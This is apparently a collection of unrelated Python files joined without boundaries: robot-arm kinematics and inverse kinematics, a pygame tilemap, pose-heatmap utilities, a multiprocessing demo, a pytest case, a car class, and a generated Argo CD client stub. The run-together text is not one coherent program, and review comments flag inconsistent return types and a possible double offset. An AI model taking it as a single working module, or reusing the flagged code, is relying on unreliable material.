        joint_angles = self.calc_full_joint_angles(joint_angles)
        t, allt = self.robot.fkine(joint_angles, **kwargs)
        self.joint_angles = joint_angles
        self.t = t
        self.allt = allt
        return t, allt

    def apply_joint_limits(self, joint_angles):
        '''No-op for the generic chain; subclasses clamp to their limits.'''
        return joint_angles

    def inverse_kinematics(self, target_pos, q_start=None, method='pso', **kwargs):
        '''Solve IK for target_pos, starting from q_start (random if omitted).'''
        # BUG FIX: the original tested `q_start == None`, which performs an
        # elementwise comparison when q_start is an ndarray; use identity.
        if q_start is None:
            q_start = self.random_sample()
        return self.inverse_kinematics_pso(target_pos, q_start, **kwargs)

    def inverse_kinematics_grad_descent(self, target_pos, starting_config, n_iter=1000, verbose=False, eps=0.01, return_path=False):
        '''
        Jacobian-pseudoinverse gradient-descent IK.  Redundant chains have
        infinitely many solutions; this converges to one near
        starting_config.

        Parameters
        ----------
        target_pos : np.ndarray of shape (3,)
        starting_config : np.ndarray
            Initial joint configuration (no longer mutated; see below).
        n_iter : int -- maximum iterations
        eps : float -- endpoint error for early termination
        return_path : bool -- also return the endpoint trajectory

        Returns
        -------
        q, or (q, endpoint_traj) when return_path is True
        '''
        # BUG FIX: copy so the in-place `q += qdot` below cannot mutate the
        # caller's starting_config array.
        q = np.copy(starting_config)
        start_time = time.time()
        endpoint_traj = np.zeros([n_iter, 3])
        joint_limited = np.zeros(len(q))
        for k in range(n_iter):
            # current endpoint position of the manipulator
            endpoint_traj[k] = self.endpoint_pos(q)
            current_cost = np.linalg.norm(endpoint_traj[k] - target_pos, 2)
            if current_cost < eps:
                print("Terminating early")
                break
            # step toward the target along the pseudoinverse of the
            # positional part of the jacobian
            J = self.jacobian(q)
            J_pos = J[0:3,:]
            J_inv = np.linalg.pinv(J_pos)
            xdot = (target_pos - endpoint_traj[k])
            qdot = 0.001*np.dot(J_inv, xdot)
            qdot = self.full_angles_to_subset(np.array(qdot).ravel())
            q += qdot
            # apply joint limits
            q, joint_limited = self.apply_joint_limits(q)
        end_time = time.time()
        runtime = end_time - start_time
        if verbose:
            print("Runtime: %g" % runtime)
            print("# of iterations: %g" % k)
        if return_path:
            return q, endpoint_traj[:k]
        else:
            return q

    def jacobian(self, joint_angles):
        '''Return the full manipulator jacobian (robot.jacobn convention).'''
        joint_angles = self.calc_full_joint_angles(joint_angles)
        J = self.robot.jacobn(joint_angles)
        return J

    def endpoint_pos(self, joint_angles):
        '''Absolute 3D endpoint position for the given configuration.'''
        t, allt = self.forward_kinematics(joint_angles)
        pos_rel_to_base = np.array(t[0:3,-1]).ravel()
        return pos_rel_to_base + self.base_loc

    def ik_cost(self, q, q_start, target_pos, weight=100):
        '''IK objective: motion of the first two joints plus weighted endpoint error.'''
        q_diff = q - q_start
        return np.linalg.norm(q_diff[0:2]) + weight*np.linalg.norm(self.endpoint_pos(q) - target_pos)

    def inverse_kinematics_pso(self, target_pos, q_start, time_limit=np.inf, verbose=False, eps=0.5, n_particles=10, n_iter=10):
        '''
        Particle-swarm IK: minimize ik_cost around q_start.

        Requires self.joint_limits to be set (used to clamp particles).

        Returns
        -------
        np.ndarray -- best configuration found
        '''
        # Initialize the particles at the start configuration with random velocities.
        n_joints = self.n_joints
        particles_q = np.tile(q_start, [n_particles, 1])
        particles_v = np.random.randn(n_particles, n_joints)
        cost_fn = lambda q: self.ik_cost(q, q_start, target_pos)
        gbest = particles_q.copy()
        gbestcost = np.array(list(map(cost_fn, gbest)))
        pbest = gbest[np.argmin(gbestcost)]
        pbestcost = cost_fn(pbest)
        min_limits = np.array([x[0] for x in self.joint_limits])
        max_limits = np.array([x[1] for x in self.joint_limits])
        min_limits = np.tile(min_limits, [n_particles, 1])
        max_limits = np.tile(max_limits, [n_particles, 1])
        start_time = time.time()
        for k in range(n_iter):
            if time.time() - start_time > time_limit:
                break
            # update positions of particles
            particles_q += particles_v
            # clamp to joint limits
            min_viol = particles_q < min_limits
            max_viol = particles_q > max_limits
            particles_q[min_viol] = min_limits[min_viol]
            particles_q[max_viol] = max_limits[max_viol]
            # update the costs
            costs = np.array(list(map(cost_fn, particles_q)))
            # update the per-particle and global bests
            gbest[gbestcost > costs] = particles_q[gbestcost > costs]
            gbestcost[gbestcost > costs] = costs[gbestcost > costs]
            idx = np.argmin(gbestcost)
            pbest = gbest[idx]
            pbestcost = gbestcost[idx]
            # update the velocity (fixed inertia/attraction coefficients)
            phi1 = 1
            phi2 = 1
            w=0.25
            c1=0.5
            c2=0.25
            particles_v = w*particles_v + c1*phi1*(pbest - particles_q) + c2*phi2*(gbest - particles_q)
            error = np.linalg.norm(self.endpoint_pos(pbest) - target_pos)
            if error < eps:
                break
        end_time = time.time()
        if verbose: print("Runtime = %g, error = %g, n_iter=%d" % (end_time-start_time, error, k))
        return pbest

    def spatial_positions_of_joints(self, joint_angles):
        '''Absolute 3D positions of every joint for the given configuration.'''
        _, allt = self.forward_kinematics(joint_angles, return_allt=True)
        pos = (allt[0:3, -1,:].T + self.base_loc).T
        return pos
class PlanarXZKinematicChain(KinematicChain):
    '''
    Kinematic chain restricted to movement in the XZ-plane
    '''
    def _init_serial_link(self):
        # One revolute joint per link; a fixed base link tilts the chain
        # into the XZ-plane.
        base = robot.Link(alpha=pi/2, d=0, a=0)
        links = [base]
        for link_length in self.link_lengths:
            link1 = robot.Link(alpha=0, d=0, a=link_length)
            links.append(link1)
        self.robot = robot.SerialLink(links)

    def calc_full_joint_angles(self, joint_angles):
        '''
        Only some joints rotate in the planar kinematic chain.

        Parameters
        ----------
        joint_angles : np.ndarray of shape (self.n_links)
            Joint angles without the angle for the base link, which is fixed at 0

        Returns
        -------
        joint_angles_full : np.ndarray of shape (self.n_links+1)
            Add on the 0 at the proximal end for the base link angle
        '''
        if not len(joint_angles) == self.n_links:
            raise ValueError("Incorrect number of joint angles specified!")
        joint_angles_full = np.hstack([0, joint_angles])
        return self.rotation_convention * joint_angles_full

    def random_sample(self):
        '''
        Sample a configuration uniformly within each joint's limits
        (defaults to (-pi, pi) per joint when no limits are set).
        '''
        if hasattr(self, 'joint_limits'):
            joint_limits = self.joint_limits
        else:
            joint_limits = [(-np.pi, np.pi)] * self.n_links
        q_start = []
        for lim_min, lim_max in joint_limits:
            q_start.append(np.random.uniform(lim_min, lim_max))
        return np.array(q_start)

    def full_angles_to_subset(self, joint_angles):
        '''Drop the static base-link angle added by calc_full_joint_angles.'''
        return joint_angles[1:]

    def apply_joint_limits(self, joint_angles):
        '''
        Clamp joint_angles to self.joint_limits.

        Returns
        -------
        (clamped_angles, limit_hit_mask) when limits are set.
        '''
        # NOTE(review): without joint_limits this returns a bare array while
        # the limited branch returns an (angles, mask) tuple -- callers that
        # unpack two values rely on limits being set; confirm intended.
        if not hasattr(self, 'joint_limits'):
            return joint_angles
        else:
            angles = []
            limit_hit = []
            for angle, (lim_min, lim_max) in zip(joint_angles, self.joint_limits):
                limit_hit.append(angle < lim_min or angle > lim_max)
                angle = max(lim_min, angle)
                angle = min(angle, lim_max)
                angles.append(angle)
            return np.array(angles), np.array(limit_hit)

    @property
    def n_joints(self):
        '''
        In a planar arm, the number of joints equals the number of links
        '''
        return len(self.link_lengths)

    def spatial_positions_of_joints(self, *args, **kwargs):
        '''Absolute 3D positions of every joint (see parent class).'''
        pos_all_joints = super(PlanarXZKinematicChain, self).spatial_positions_of_joints(*args, **kwargs)
        return pos_all_joints

    def create_ik_subchains(self):
        '''Split the chain into a 2-link proximal chain (closed-form IK) and a distal remainder.'''
        proximal_link_lengths = self.link_lengths[:2]
        distal_link_lengths = self.link_lengths[2:]
        self.proximal_chain = PlanarXZKinematicChain2Link(proximal_link_lengths)
        if len(self.link_lengths) > 2:
            self.distal_chain = PlanarXZKinematicChain(distal_link_lengths)
        else:
            self.distal_chain = None

    def inverse_kinematics(self, target_pos, **kwargs):
        '''
        IK by sampling the redundant distal joints and solving the 2-link
        proximal chain in closed form for the remainder.

        Parameters
        ----------
        target_pos : np.ndarray of shape (3,)
            Target endpoint position in absolute coordinates.
        distal_angles : np.ndarray, optional (kwarg)
            Fixed angles for the distal joints; sampled randomly if omitted.

        Returns
        -------
        np.ndarray of joint angles, wrapped to (-pi, pi].
        '''
        target_pos = target_pos.copy()
        target_pos -= self.base_loc
        if not hasattr(self, 'proximal_chain') or not hasattr(self, 'distal_chain'):
            self.create_ik_subchains()
        if len(self.link_lengths) > 2:
            distal_angles = kwargs.pop('distal_angles', None)
            if distal_angles is None:
                # Sample randomly from the joint limits (-pi, pi) if not specified
                if not hasattr(self, 'joint_limits') or len(self.joint_limits) < len(self.link_lengths):
                    joint_limits = [(-pi, pi)] * len(self.distal_chain.link_lengths)
                else:
                    joint_limits = self.joint_limits[2:]
                distal_angles = np.array([np.random.uniform(*limits) for limits in joint_limits])
            distal_displ = self.distal_chain.endpoint_pos(distal_angles)
            proximal_endpoint_pos = target_pos - distal_displ
            proximal_angles = self.proximal_chain.inverse_kinematics(proximal_endpoint_pos).ravel()
            angles = distal_angles.copy()
            joint_angles = proximal_angles.tolist()
            # distal angles are relative; subtract the proximal chain's total rotation
            angles[0] -= np.sum(proximal_angles)
            ik_angles = np.hstack([proximal_angles, angles])
            # wrap all angles into (-pi, pi]
            ik_angles = np.array([np.arctan2(np.sin(angle), np.cos(angle)) for angle in ik_angles])
            return ik_angles
        else:
            return self.proximal_chain.inverse_kinematics(target_pos).ravel()

    def jacobian(self, theta, old=False):
        '''
        Returns the first derivative of the forward kinematics function for x and z endpoint positions:
        [[dx/dtheta_1, ..., dx/dtheta_N]
         [dz/dtheta_1, ..., dz/dtheta_N]]

        Parameters
        ----------
        theta : np.ndarray of shape (N,)
            Valid configuration for the arm (the jacobian calculations are specific to the configuration of the arm)
        old : bool
            Use the hand-derived planar formula instead of the D-H toolbox.

        Returns
        -------
        J : np.ndarray of shape (2, N)
            Manipulator jacobian in the format above
        '''
        if old:
            # Calculate jacobian based on hand calculation specific to this type of chain
            l = self.link_lengths
            N = len(theta)
            J = np.zeros([2, len(l)])
            for m in range(N):
                for i in range(m, N):
                    J[0, m] += -l[i]*np.sin(sum(self.rotation_convention*theta[:i+1]))
                    J[1, m] += l[i]*np.cos(sum(self.rotation_convention*theta[:i+1]))
            return J
        else:
            # Use the robotics toolbox and the generic D-H convention jacobian
            J = self.robot.jacob0(self.calc_full_joint_angles(theta))
            return np.array(J[[0,2], 1:])

    def endpoint_potent_null_split(self, q, vel, return_J=False):
        '''
        (Approximately) split joint velocities into an endpoint potent component,
        which moves the endpoint, and an endpoint null component which only causes self-motion
        '''
        J = self.jacobian(q)
        J_pinv = np.linalg.pinv(J)
        J_task = np.dot(J_pinv, J)
        J_null = np.eye(self.n_joints) - J_task
        vel_task = np.dot(J_task, vel)
        vel_null = np.dot(J_null, vel)
        if return_J:
            return vel_task, vel_null, J, J_pinv
        else:
            return vel_task, vel_null

    def config_change_nullspace_workspace(self, config1, config2):
        '''
        For two configurations, determine how much joint displacement is in
        the "task" space (endpoint motion) versus total per-joint endpoint
        displacement.

        Returns
        -------
        (task_displ, total_joint_displ)
        '''
        config = config1
        vel = config2 - config1
        endpt1 = self.endpoint_pos(config1)
        endpt2 = self.endpoint_pos(config2)
        task_displ = np.linalg.norm(endpt1 - endpt2)
        # compute total displ of individual joints
        total_joint_displ = 0
        n_joints = len(config1)
        for k in range(n_joints):
            jnt_k_vel = np.zeros(n_joints)
            jnt_k_vel[k] = vel[k]
            single_joint_displ_pos = self.endpoint_pos(config + jnt_k_vel)
            total_joint_displ += np.linalg.norm(endpt1 - single_joint_displ_pos)
        return task_displ, total_joint_displ

    def detect_collision(self, theta, obstacle_pos):
        '''
        Detect a collision between the chain and a circular object: returns
        the distance from each arm segment to obstacle_pos.
        '''
        # NOTE(review): spatial_positions_of_joints already adds base_loc
        # (see KinematicChain.spatial_positions_of_joints); adding it again
        # here looks like a double offset -- TODO confirm intended frame.
        spatial_joint_pos = self.spatial_positions_of_joints(theta).T + self.base_loc
        plant_segments = [(x, y) for x, y in zip(spatial_joint_pos[:-1], spatial_joint_pos[1:])]
        dist_to_object = np.zeros(len(plant_segments))
        for k, segment in enumerate(plant_segments):
            dist_to_object[k] = point_to_line_segment_distance(obstacle_pos, segment)
        return dist_to_object

    def plot_joint_pos(self, joint_pos, ax=None, flip=False, **kwargs):
        '''Plot one or more joint configurations projected onto the XZ-plane.'''
        # BUG FIX: `ax == None` replaced with the identity test `ax is None`.
        if ax is None:
            plt.figure()
            ax = plt.subplot(111)
        if isinstance(joint_pos, dict):
            joint_pos = np.vstack(list(joint_pos.values()))
        elif isinstance(joint_pos, np.ndarray) and np.ndim(joint_pos) == 1:
            joint_pos = joint_pos.reshape(1, -1)
        elif isinstance(joint_pos, tuple):
            joint_pos = np.array(joint_pos).reshape(1, -1)
        for pos in joint_pos:
            spatial_pos = self.spatial_positions_of_joints(pos).T
            if flip:
                ax.plot(-spatial_pos[:,0], spatial_pos[:,2], **kwargs)
            else:
                ax.plot(spatial_pos[:,0], spatial_pos[:,2], **kwargs)
        return ax
def point_to_line_segment_distance(point, segment):
    '''
    Distance between a point and a line segment.  Used to determine
    collisions between robot arm links and virtual obstacles.
    Adapted from http://stackoverflow.com/questions/849211/shortest-distance-between-a-point-and-a-line-segment
    '''
    seg_start, seg_end = segment
    seg_len_sq = np.sum(np.abs(seg_start - seg_end)**2)
    if seg_len_sq == 0:
        # Degenerate segment: both endpoints coincide.
        return np.linalg.norm(seg_start - point)
    # Parameter of the orthogonal projection along the segment (0..1 inside).
    frac = np.dot(point - seg_start, seg_end - seg_start) / seg_len_sq
    if frac < 0:
        closest = seg_start
    elif frac > 1:
        closest = seg_end
    else:
        closest = seg_start + frac * (seg_end - seg_start)
    return np.linalg.norm(closest - point)
class PlanarXZKinematicChain2Link(PlanarXZKinematicChain):
    '''Planar XZ chain with exactly two links; IK has a closed-form solution.'''
    def __init__(self, link_lengths, *args, **kwargs):
        '''
        Same constructor as PlanarXZKinematicChain, but exactly 2 links
        are required.

        Raises
        ------
        ValueError
            If link_lengths does not contain exactly 2 entries.
        '''
        if not len(link_lengths) == 2:
            raise ValueError("Can't instantiate a 2-link arm with > 2 links!")
        super(PlanarXZKinematicChain2Link, self).__init__(link_lengths, *args, **kwargs)

    def inverse_kinematics(self, pos, **kwargs):
        '''
        Inverse kinematics for a two-link kinematic chain. These equations can be solved
        deterministically.

        Parameters
        ----------
        pos : np.ndarray of shape (3,)
            Desired endpoint position where the coordinate system origin is the base of the arm. y coordinate must be 0

        Returns
        -------
        np.ndarray of shape (2,)
            Joint angles which yield the endpoint position with the forward kinematics of this manipulator
        '''
        # BUG FIX: the original `pos -= self.base_loc` mutated the caller's
        # array in place; the parent class explicitly copies before shifting.
        pos = pos - self.base_loc
        l_upperarm, l_forearm = self.link_lengths
        if np.ndim(pos) == 1:
            pos = pos.reshape(1,-1)
        # require the y-coordinate to be 0, i.e. flat on the screen
        x, y, z = pos[:,0], pos[:,1], pos[:,2]
        assert np.all(np.abs(np.array(y)) < 1e-10)
        L = np.sqrt(x**2 + z**2)
        # law of cosines for the elbow angle; clamp values that exceed 1
        # only through floating-point error
        cos_el_pflex = (L**2 - l_forearm**2 - l_upperarm**2) / (2*l_forearm*l_upperarm)
        cos_el_pflex[ (cos_el_pflex > 1) & (cos_el_pflex < 1 + 1e-9)] = 1
        el_pflex = np.arccos(cos_el_pflex)
        sh_pabd = np.arctan2(z, x) - np.arcsin(l_forearm * np.sin(np.pi - el_pflex) / L)
        return np.array([sh_pabd, el_pflex])
import pygame
from pygame.math import Vector2
import json, math
class Tilemap:
    """Tile map with chunked collision rects (chunkSize x chunkSize tiles per
    chunk) loaded from a JSON level file."""

    def __init__(self, tileSize, imgs, chunkSize=8):
        self.tileSize = tileSize
        self.imgs = imgs
        self.drawTiles = []
        self.chunks = {}
        self.chunkSize = chunkSize

    def toChunkScale(self, p):
        """Convert one world coordinate to a chunk index."""
        return math.floor(p / self.tileSize / self.chunkSize)

    def toChunkPos(self, p):
        """Convert a world-space point to its (chunk_x, chunk_y) key."""
        return (self.toChunkScale(p[0]), self.toChunkScale(p[1]))

    def collidePoint(self, p:Vector2):
        """True when the point lies inside any collision rect of its chunk."""
        key = self.toChunkPos(p)
        return any(rect.collidepoint(p) for rect in self.chunks.get(key, ()))

    def _getColRects(self, testPointsX, testPointsY, colRects):
        """Collect collision rects from every chunk touched by the given
        x/y test extents.  Extends colRects in place when a list is given."""
        low_x = self.toChunkScale(min(testPointsX))
        high_x = self.toChunkScale(max(testPointsX))
        low_y = self.toChunkScale(min(testPointsY))
        high_y = self.toChunkScale(max(testPointsY))
        corners = {
            (low_x, low_y), (low_x, high_y),
            (high_x, low_y), (high_x, high_y)
        }
        if colRects is None:
            colRects = []
        for corner in corners:
            if corner in self.chunks:
                colRects.extend(self.chunks[corner])
        return colRects

    def getEntityColRects(self, pos, width, height, vel, colRects=None):
        """Collision rects an entity (bounding box + velocity) could touch."""
        xs = (pos.x, pos.x + width, pos.x + vel.x, pos.x + width + vel.x)
        ys = (pos.y, pos.y + height, pos.y + vel.y, pos.y + height + vel.y)
        return self._getColRects(xs, ys, colRects)

    def getRectColRects(self, rect, colRects=None):
        """Collision rects a static rect could touch."""
        return self._getColRects((rect.x, rect.right), (rect.y, rect.bottom), colRects)

    def draw(self, win, scroll=None):
        """Blit all visible tiles, offset by the camera scroll."""
        if scroll is None: scroll = Vector2(0, 0)
        win_w, win_h = win.get_size()
        for layer in self.drawTiles:
            for tile_x, tile_y, img_idx in layer:
                # Cull tiles entirely outside the window.
                if scroll.x - self.tileSize < tile_x < win_w + scroll.x and \
                        scroll.y - self.tileSize < tile_y < win_h + scroll.y:
                    win.blit(self.imgs[img_idx], (tile_x - scroll.x, tile_y - scroll.y))

    def drawCollision(self, win, scroll=None):
        """Debug view: outline every chunk and its collision rects."""
        if scroll is None: scroll = Vector2(0, 0)
        palette = ((255,0,0), (0,255,0), (0,0,255))
        span = self.tileSize * self.chunkSize
        for (chunk_x, chunk_y), rects in self.chunks.items():
            pygame.draw.rect(win, (255,255,255),
                             (chunk_x * span - scroll.x,
                              chunk_y * span - scroll.y,
                              span, span), 1)
            for i, rect in enumerate(rects):
                pygame.draw.rect(win, palette[i % len(palette)],
                                 (rect.x - scroll.x, rect.y - scroll.y,
                                  rect.w, rect.h), width=1)

    def loadLevel(self, filepath):
        """Load draw layers and chunked collision rects from a JSON file.

        Returns the optional "extraData" value when the file provides one.
        """
        with open(filepath, 'r') as f:
            data = json.loads(f.read())
        for layer in data["drawTiles"]:
            parsed_layer = []
            for key, img_idx in layer.items():
                parts = key.split(';')
                tile_x, tile_y = int(parts[0]), int(parts[1])
                parsed_layer.append((tile_x * self.tileSize, tile_y * self.tileSize, img_idx))
            self.drawTiles.append(parsed_layer)
        for pos_key, rect_specs in data["chunks"].items():
            parts = pos_key.split(';')
            self.chunks[(int(parts[0]), int(parts[1]))] = [pygame.Rect(spec) for spec in rect_specs]
        if "extraData" in data:
            return data["extraData"]
"""
Miscellaneous utility functions.
"""
import random
import time
from contextlib import contextmanager
import math
import numpy as np
import torch
from PIL.ImageDraw import Draw
# Joints to connect for visualisation, giving the effect of drawing a
# basic "skeleton" of the pose.
# Values are (joint_index_a, joint_index_b) pairs into the 16-joint pose
# array described in draw_skeleton's docstring.
BONES = {
    # right leg + pelvis
    'right_lower_leg': (0, 1),
    'right_upper_leg': (1, 2),
    'right_pelvis': (2, 6),
    # left leg + pelvis
    'left_lower_leg': (4, 5),
    'left_upper_leg': (3, 4),
    'left_pelvis': (3, 6),
    # torso and head
    'center_lower_torso': (6, 7),
    'center_upper_torso': (7, 8),
    'center_head': (8, 9),
    # right arm
    'right_lower_arm': (10, 11),
    'right_upper_arm': (11, 12),
    'right_shoulder': (12, 8),
    # left arm
    'left_lower_arm': (14, 15),
    'left_upper_arm': (13, 14),
    'left_shoulder': (13, 8),
}
def draw_skeleton(img, coords, joint_mask=None):
    '''Draw a pose skeleton connecting joints (for visualisation purposes).

    Left-hand-side joints are connected with blue lines. Right-hand-side
    joints are connected with red lines. Center joints are connected with
    magenta lines.

    Args:
        img (PIL.Image.Image): PIL image which the skeleton will be drawn over.
        coords (Tensor): 16x2 tensor containing 0-based pixel coordinates
            of joint locations. Joints indices are expected to match
            http://human-pose.mpi-inf.mpg.de/#download
        joint_mask (Tensor, optional): Mask of valid joints (invalid joints
            will be drawn with grey lines).
    '''
    canvas = Draw(img)
    side_colours = {
        'center': (255, 0, 255),  # Magenta
        'left': (0, 0, 255),      # Blue
        'right': (255, 0, 0),     # Red
    }
    for bone_name, (j1, j2) in BONES.items():
        side = bone_name.split('_', 1)[0]
        colour = side_colours.get(side, (255, 255, 255))
        # Grey out bones with an invalid endpoint.
        if joint_mask is not None and (joint_mask[j1] == 0 or joint_mask[j2] == 0):
            colour = (100, 100, 100)
        canvas.line([coords[j1, 0], coords[j1, 1], coords[j2, 0], coords[j2, 1]], fill=colour)
def draw_gaussian(img_tensor, x, y, sigma, normalize=False, clip_size=None):
    '''Draw a Gaussian in a single-channel 2D image.

    Args:
        img_tensor: Image tensor to draw to (modified in place).
        x: x-coordinate of Gaussian centre (in pixels).
        y: y-coordinate of Gaussian centre (in pixels).
        sigma: Standard deviation of Gaussian (in pixels).
        normalize: Ensures values sum to 1 when True.
        clip_size: Restrict the size of the draw region.
    '''
    # Truncation (not rounding) of the centre follows prior implementations.
    x, y = int(x), int(y)
    if img_tensor.dim() == 3:
        n_chans, height, width = list(img_tensor.size())
        assert n_chans == 1, 'expected img_tensor to have one channel'
        img_tensor = img_tensor[0]
    elif img_tensor.dim() == 2:
        height, width = list(img_tensor.size())
    else:
        raise Exception('expected img_tensor to have 2 or 3 dimensions')
    radius = max(width, height) if clip_size is None else clip_size / 2
    centre_outside = (x <= -radius or y <= -radius
                      or x >= (width - 1) + radius or y >= (height - 1) + radius)
    if radius < 0.5 or centre_outside:
        # Nothing visible to draw.
        return
    x0 = max(0, math.ceil(x - radius))
    x1 = min(width, int(x + radius + 1))
    y0 = max(0, math.ceil(y - radius))
    y1 = min(height, int(y + radius + 1))
    patch = img_tensor[y0:y1, x0:x1]
    cols = torch.arange(x0, x1).type_as(img_tensor).view(1, x1 - x0).expand_as(patch)
    rows = torch.arange(y0, y1).type_as(img_tensor).view(y1 - y0, 1).expand_as(patch)
    coeff = -0.5 * (1 / sigma)**2
    # exp(coeff * ((col-x)^2 + (row-y)^2)), computed in place on the patch.
    patch.copy_((cols - x)**2)
    patch.add_((rows - y)**2)
    patch.mul_(coeff)
    patch.exp_()
    if normalize:
        total = patch.sum()
        if total > 0:
            patch.div_(total)
def encode_heatmaps(coords, width, height, sigma=1):
    '''Convert normalised coordinates into per-joint Gaussian heatmaps.

    NOTE: mutates `coords` in place (normalised [-1, 1] -> pixel space).
    '''
    # Normalised coordinates to pixel coordinates (in place).
    coords.add_(1)
    coords[:, :, 0].mul_(width / 2)
    coords[:, :, 1].mul_(height / 2)
    coords.add_(-0.5)
    n_batches = coords.size(0)
    n_joints = coords.size(1)
    target = torch.FloatTensor(n_batches, n_joints, height, width).zero_()
    for b in range(n_batches):
        for j in range(n_joints):
            # NOTE(review): round() on a 0-dim tensor may need .item() on
            # newer torch versions -- confirm against the torch in use.
            cx = round(coords[b, j, 0])
            cy = round(coords[b, j, 1])
            draw_gaussian(target[b, j], cx, cy, sigma, normalize=False, clip_size=7)
    return target
def get_preds(heatmaps):
    '''Extract per-channel argmax pixel coordinates from heatmaps.

    Args:
        heatmaps (Tensor): batch_size x n_chans x height x width.

    Returns:
        FloatTensor of shape batch_size x n_chans x 2 holding (x, y) pixel
        coordinates; channels whose maximum is <= 0 yield (0, 0).
    '''
    batch_size, n_chans, height, width = list(heatmaps.size())
    maxval, idx = torch.max(heatmaps.view(batch_size, n_chans, -1), 2)
    maxval = maxval.view(batch_size, n_chans, 1)
    idx = idx.view(batch_size, n_chans, 1)
    coords = idx.repeat(1, 1, 2)
    # Flat index -> (x, y): column = idx % width, row = idx // width.
    # BUG FIX: the original divided by `height` (wrong for non-square maps)
    # with true division, which fails on integer tensors in modern torch.
    coords[:, :, 0] = coords[:, :, 0] % width
    coords[:, :, 1] = torch.div(coords[:, :, 1], width, rounding_mode='floor')
    coords = coords.float()
    # When maxval is zero, select coords (0, 0)
    pred_mask = maxval.gt(0).repeat(1, 1, 2).float()
    torch.mul(coords, pred_mask, out=coords)
    return coords
def decode_heatmaps(heatmaps, use_neighbours=True):
    '''Convert heatmaps into normalised coordinates.'''
    coords = get_preds(heatmaps)
    _, _, height, width = list(heatmaps.size())
    if use_neighbours:
        # "To improve performance at high precision thresholds the prediction
        # is offset by a quarter of a pixel in the direction of its next highest
        # neighbor before transforming back to the original coordinate space
        # of the image"
        #  - Stacked Hourglass Networks for Human Pose Estimation
        for sample_idx, joint_coords in enumerate(coords):
            for joint_idx, (px, py) in enumerate(joint_coords):
                px, py = int(px), int(py)
                # Skip border pixels: no complete neighbourhood there.
                if 0 < px < width - 1 and 0 < py < height - 1:
                    hm = heatmaps[sample_idx, joint_idx]
                    joint_coords[joint_idx, 0] += (0.25 * np.sign(hm[py, px + 1] - hm[py, px - 1]))
                    joint_coords[joint_idx, 1] += (0.25 * np.sign(hm[py + 1, px] - hm[py - 1, px]))
    # Pixel coordinates back to normalised [-1, 1] coordinates (in place).
    coords.add_(0.5)
    coords[:, :, 0].mul_(2 / width)
    coords[:, :, 1].mul_(2 / height)
    coords.add_(-1)
    return coords
def type_as_index(indices, tensor):
    """Cast *indices* to the LongTensor flavour (CPU/CUDA) matching *tensor*."""
    target_type = torch.cuda.LongTensor if tensor.is_cuda else torch.LongTensor
    return indices.type(target_type)
def reverse_tensor(tensor, dim):
    """Return a copy of *tensor* with its elements reversed along *dim*.

    Uses the built-in torch.Tensor.flip instead of the original hand-rolled
    arange + index_select, which is simpler and avoids an index-tensor
    allocation; the result is still a new tensor, as before.
    """
    return tensor.flip(dim)
@contextmanager
def timer(meter):
    """Context manager: add the elapsed wall time of the block to *meter*.

    Note: if the block raises, nothing is recorded (matching the original).
    """
    begin = time.perf_counter()
    yield
    meter.add(time.perf_counter() - begin)
def generator_timer(generator, meter):
    """Wrap *generator*, timing each next() call into *meter*."""
    while True:
        with timer(meter):
            item = next(generator)
        yield item
def seed_random_number_generators(seed):
    """Seed every random number generator used by the project.

    Covers Python's ``random``, NumPy, and both CPU and CUDA PyTorch RNGs
    (the CUDA call is a no-op when no GPU is present).
    """
    for seeder in (random.seed,
                   np.random.seed,
                   torch.manual_seed,
                   torch.cuda.manual_seed_all):
        seeder(seed)
| 7,295 | 2,664 |
import os
import time
from datetime import datetime
from multiprocessing import Process, Pool
def run_proc(n):
    """Worker task: print the iteration index plus child/parent PIDs, then sleep 1s."""
    print('第{}次循环,子进程id:{},父进程id:{}'.format(n, os.getpid(), os.getppid()))
    time.sleep(1)
if __name__ == '__main__':
    # Print the parent PID once; the alternative execution models below are
    # kept commented out for side-by-side timing comparisons.
    print('父进程id', os.getpid())
    # 1. Run the tasks sequentially
    # start = datetime.now()
    # for i in range(10):
    #     run_proc(i)
    # print('耗时:', datetime.now() - start)
    # 2. Run the tasks in parallel with multiple processes
    # 2.1 Asynchronous parallel execution: no ordering between child processes
    # start = datetime.now()
    # for i in range(10):
    #     p = Process(target=run_proc, args=(i,))
    #     p.start()
    # print('耗时:', datetime.now() - start)
    # 2.2 Synchronous execution: join after each start, so children run in order
    # start = datetime.now()
    # for i in range(10):
    #     p = Process(target=run_proc, args=(i,))
    #     p.start()
    #     p.join()
    # print('耗时:', datetime.now() - start)
    # 3. Manage the workers with a process pool
    # 3.1 Pool.apply: synchronous execution through the pool
    # pool = Pool()
    # start = datetime.now()
    # for i in range(10):
    #     pool.apply(func=run_proc, args=(i,))
    # pool.close()
    # pool.join()
    # print('耗时:', datetime.now() - start)
    # 3.2 Pool.apply_async: asynchronous execution through the pool
    # pool = Pool()
    # start = datetime.now()
    # for i in range(10):
    #     pool.apply_async(func=run_proc, args=(i,))
    # pool.close()
    # pool.join()
    # print('耗时:', datetime.now() - start)
| 1,321 | 633 |
import pytest
from ..change_case import change_case
@pytest.mark.parametrize("x_str, expected", [
    ("BLACKstar", "blackSTAR"),
    ("jOhn", "JoHN")
])
def test_change_case(x_str, expected):
    """change_case should invert the case of every character in the string."""
    actual = change_case(x_str)
    assert actual == expected
| 268 | 104 |
class Carro:
    """Simple car model whose speed stays between 0 and ``velocidadeMaxima``."""

    def __init__(self, velocidadeMaxima):
        self.velocidadeMaxima = velocidadeMaxima
        self.velocidade = 0

    def acelerar(self, delta=5):
        """Increase the speed by *delta* and return it, capped at the maximum.

        Fix: the original clamped the returned speed to a hard-coded 180,
        which only worked when ``velocidadeMaxima`` happened to be 180, and
        it also let the stored ``velocidade`` overshoot the limit until the
        next call. Clamping to ``velocidadeMaxima`` handles every car.
        """
        self.velocidade = min(self.velocidade + delta, self.velocidadeMaxima)
        return self.velocidade

    def frear(self, delta=20):
        """Decrease the speed by *delta* and return it, never below zero.

        Fix: the original could leave a negative ``velocidade`` stored on the
        instance (it only clamped the return value); the state is now clamped
        as well.
        """
        self.velocidade = max(self.velocidade - delta, 0)
        return self.velocidade
if __name__ == '__main__':
    # Quick manual demo: accelerate past the 180 km/h cap, then brake back to 0.
    c1 = Carro(180)
    for _ in range(25):
        print(f'Acelerando {c1.acelerar(8)}')
    for _ in range(10):
        print(f' reduzindo a velocidade {c1.frear(delta=20)}')
# coding: utf-8
"""
Consolidate Services
Description of all APIs # noqa: E501
The version of the OpenAPI document: version not set
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
from argocd_client.configuration import Configuration
class ApplicationApplicationSyncRequest(object):
    """NOTE: This class is auto generated by OpenAPI Generator.
